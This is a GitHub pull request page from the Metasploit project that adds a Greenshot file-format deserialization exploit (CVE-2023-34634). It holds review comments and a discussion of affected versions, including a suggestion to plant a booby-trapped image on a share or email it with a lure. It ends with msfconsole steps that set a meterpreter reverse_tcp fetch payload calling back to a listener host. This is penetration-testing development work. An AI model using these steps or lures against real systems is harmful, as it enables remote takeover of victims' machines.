New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add CVE-2023-34634, Greenshot Fileformat exploit #18253
Conversation
modules/exploits/windows/fileformat/greenshot_deserialize_cve_2023_34634.rb
Outdated
Show resolved
Hide resolved
I think the use case most likely here is to infect a greenshot image on a share drive or as an attachment. Even if we used a 1 px image, the application itself would still be open, and then it would be an empty image that I think would be more concerting. I included an image mostly just for testing purposes, though emailing it to me and saying "Look at this cute dog" might just get me. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Looks good to me; The image itself is the exploit - rather than a byproduct/side-effect that shows to the user
Happy to land once all goes green 👍 |
Release NotesThis PR adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6. |
@cgranleese-r7 could you test the latest unstable release from Greenshot, is that one also vulnerable ?? |
@AkechiShiro, please see the documentation and description of the module:
I did not do an analysis to determine if there's a workaround or why the vulnerability is patched, but I was not able to get this exploit to work on anything newer than 1.3.274 |
@bwatters-r7 I'm sorry, but I've gotten really confused with the way releases/changelog and security fixes are handled by Greenshot.
It would be easier, just at a glance to know, which version is fixed or not. |
This is not working currently and is a placeholder.This PR adds a fileformat exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6
Verification
msfconsole
use exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634
set payload cmd/windows/http/x64/meterpreter/reverse_tcp
set FETCH_SRVHOST 10.5.135.201
set LHOST 10.5.135.201
set FETCH_WRITABLE_DIR %TEMP%
set DisablePayloadHandler false
set wfsdelay 600
run